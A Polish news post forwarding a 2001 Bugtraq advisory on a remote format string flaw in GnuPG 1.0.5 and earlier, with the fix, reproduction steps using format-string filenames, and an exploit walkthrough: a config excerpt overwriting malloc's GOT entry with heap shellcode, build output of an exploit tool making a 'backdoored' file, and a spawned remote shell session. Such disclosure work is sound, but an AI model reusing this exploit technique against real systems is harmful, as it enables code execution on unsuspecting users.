GnuGPG, program szyfrujący posiadający pełną funkcjonalność PGP i używany przez coraz więcej osób, ma poważny błąd mogący narazić bezpieczeństwo systemu, a w każdym razie umożliwić niektórym użytkownikom dostęp do danych, do których dostępu mieć nie powinni. Oczywiście, nie oznacza to, że nasze zaszyfrowane wiadomości nie są bezpieczne…

Pełen opis buga zamieszczam w dalszej części artykułu, a na naszym serwerze znajdziecie patcha na wersję 1.0.5 tego programu. Również wersja 1.0.6 jest pozbawiona tego błędu.

  ----- Forwarded message from fish stiqz  -----    Date: Tue, 29 May 2001 19:58:48 +0200  From: fish stiqz   To: bugtraq@securityfocus.com  Subject: [synnergy] - GnuPG remote format string vulnerability    ---------------------------------------------------------------------------        Remote arbitrary code execution vulnerability in GnuPG <= 1.0.5                                 Synnergy Networks (http://www.synnergy.net/)                       By: fish stiqz                              Released: 05/29/2001  ---------------------------------------------------------------------------                ( Will the REAL GnuPG bug please stand up? )  ---------------------------------------------------------------------------    ---------------------------------------------------------------------------  [ Contents of this Advisory ]    0. Introduction  1. Problem  2. Solution  3. Exploit Discussion  4. Credit and Thanks    ---------------------------------------------------------------------------  [ Introduction ]    GnuPG is a very popular GNU replacement for the public key encryption  program PGP.  As described by its website (http://www.gnupg.org/):    > GnuPG is a complete and free replacement for PGP. Because it does not  > use the patented IDEA algorithm, it can be used without any  > restrictions. GnuPG is a RFC2440 (OpenPGP) compliant application.     Hidden deep within its code is a format string vulnerability which can be  triggered simply by attempting to decrypt a file with a specially crafted  filename.  This vulnerability can allow a malicious user to gain  unathorized access to the account which attempted the decryption.    ---------------------------------------------------------------------------  [ Problem ]    The problem code lies in util/ttyio.c in the 'do_get' function.  There is  a call to a function called 'tty_printf' (which eventually results in a  vfprintf call) without a constant format string:    >     tty_printf( prompt );    If gpg attempts to decrypt a file whose filename does not end in ".gpg",  that filename (minus the extension) is copied to the prompt string,  allowing a user-suppliable format string.      ---------------------------------------------------------------------------  [ Solution ]    The vulnerable call obviously needs the "%s" conversion:    >     tty_printf( "%s", prompt );    The newest release of GnuPG (version 1.0.6) contains this security fix,   as well as implementing many new features.  It can be obtained from  http://www.gnupg.org/download.html.  All GnuPG users are strongly urged to  upgrade as soon as possible.    ---------------------------------------------------------------------------  [ Exploit Discussion]    In order to show the severity of the bug, look first at how it is  reproduced.    1. Create a file with a valid format string as the filename.      $ echo "hello, how are you friend?" > %8x_%8x_%8x    2. Encrypt this file.      $ gpg -r fish@analog.org -e %8x_%8x_%8x    gpg: this cipher algorithm is depreciated; please use a more standard one!      $ ls %8x_%8x_%8x*    %8x_%8x_%8x  %8x_%8x_%8x.gpg    3. gpg added the ".gpg" extension to the new encrypted file, give it a  different one.      $ mv %8x_%8x_%8x.gpg %8x_%8x_%8x.el8    4. Now, attempt to decrypt the file.      $ gpg %8x_%8x_%8x.el8      You need a passphrase to unlock the secret key for    user: "fish stiqz (bleh) "    1024-bit ELG-E key, ID D31DF63D, created 2001-05-24 (main key ID 5ABD075F)      gpg: %8x_%8x_%8x.el8: unknown suffix    Enter new filename [ 80af5d9_ 80cefb8_ 80af5ca]:     Now you will notice that the %8x's were expanded!  However, the actual  filename is not our format string.  The original filename, which is stored  inside the file as part of the encrypted data, is the real format string.   So the file could be renamed again and still produce the same result:      $ mv %8x_%8x_%8x.el8 README.TXT    $ gpg README.TXT      You need a passphrase to unlock the secret key for    user: "fish stiqz (bleh) "    1024-bit ELG-E key, ID D31DF63D, created 2001-05-24 (main key ID 5ABD075F)      gpg: README.TXT: unknown suffix    Enter new filename [ 80af5d9_ 80cefb0_ 80af5ca]:       The exploit I have created simply creates and encrypts a file that  exploits this vulnerability.  However, considering that there is no  possible way to determine what type of machine the file will be decrypted  on, the size of the remote environment, the location that libc is mapped,  etc... the exploit will require a lot of knowledge about the remote system  for it to work.  For this reason, this exploit can be considered "Proof of  Concept".    There were a few hurdles to get around while building this exploit.      First, since this a remote attack, there are only two  ways to feed data to gpg.  1) Through the filename and 2) through   the encrypted data inside the file.  Option #1 seemed easiest to  use, so I used it.    Second, since there are limitations on the size of a filename, 255 bytes  on Linux systems for example, we need a small format string and a small  remote shellcode.  The format string and shellcode combination would be  located on the stack, allowing the Linux kernel patch from the Openwall   Project to defend against this kind of attack.  However, this is not  acceptable for an exploit by fish stiqz ;-).  Before the vulnerable call,  the prompt is created on the heap, and the format string copied to  it. The filename (our format string and shellcode combination) taken from  the data inside the file, is also  copied to the heap, allowing two  different places to store a remote shellcode on the heap.  The first  location is complicated by the fact that the prompt is filtered through  iscntrl(), escaping all characters in the range of 0x00-0x1f and   0x7f.  But, since I thought it would be fun to make some remote shellcode  to get around this, I chose to use the first location on the heap, but  either one is fine.    Example exploitation:   (overwrite the GOT entry of malloc() to point to the shellcode on the heap)    (from config.h in the exploit)    /*  */    /* location of the *local* copy of gpg, used to encrypt the file */  #define DEFAULT_GPG_PATH "/usr/local/bin/gpg"    /* contents appended to the format string, or NULL if you want to skip it */  #define APPEND lnx_i386_remote_shellcode    /* only needed if appending APPEND is defined, NULL if you wanna skip */  #define ARCHNOP "x90"    /* the overwrites (most definitely needed) */  short_write_t short_array[] =  {      /* overwrite 0x080c9dc4 (GOT of malloc) with 0x080cca60 (shellcode) */      { 0xca60, 0x080c9dc4 + 0 },      { 0x080c, 0x080c9dc4 + 2 },      { 0, 0 }  };    /*  */      Make the backdoored file:      $ make clean && make    rm -f *~ *.o gnupig     gcc -Wall -O2 -g -c gnupig.c    gcc -Wall -O2 -g -c common.c    gcc -Wall -O2 -g -c file.c    gcc -Wall -O2 -g -c shellcode.c    gcc -Wall -O2 -g -c fmtstr.c    gcc -Wall -O2 -g -o gnupig gnupig.o common.o file.o shellcode.o fmtstr.o       $ ./gnupig -s -e 366 -a 4 -k fish@analog.org     [0] shellcode passed.    [1] running gpg to encrypt the dummy file.    gpg: this cipher algorithm is depreciated; please use a more standard one!    [2] created dummy file successfully.    User runs gpg on the encrypted file:      $ gpg *.el8    ...       Remote shell is spawned:      (in other terminal)    $ telnet localhost 16705    Trying 127.0.0.1...    Connected to localhost.    Escape character is '^]'.    id;      uid=1000(fish) gid=100(users)    exit;    Connection closed by foreign host.      There are a few other tricks you can do, like doing a return into libc   attacks and writing the payload with the format string, which can be  performed by this exploit.  It is a very versatile tool.  Unfortunately,  or fortunately (depending on your point of view), these types of   attacks will also be unreliable (due to the fact that we dont know the  remote environment or how gpg is spawned).      -------------------------------------------------------------------------  [ Credit and Thanks ]    Tha
nks to the GnuPG developers for an excellent program.    Many thanks to all of those involved with this.  MaXX and dethy, you  have been some great guys to work with, thanks for all the help.    Shouts:   - MaXX and dethy - you guys RULE!   - scrippie for the format string generation ideas.   - venomous for the late night irc conversation ;-)   - ysyi & async.org    -------------------------------------------------------------------------    As always, if updates of this exploit or advisory are made, they will  be posted to my website: http://gibson.analog.org/    The exploit code is attached.    - fish stiqz    Synnergy Networks        ----- End forwarded message -----  

Archiwalny news dodany przez użytkownika: honey.
Kliknij tutaj by zobaczyć archiwalne komentarze.

Share →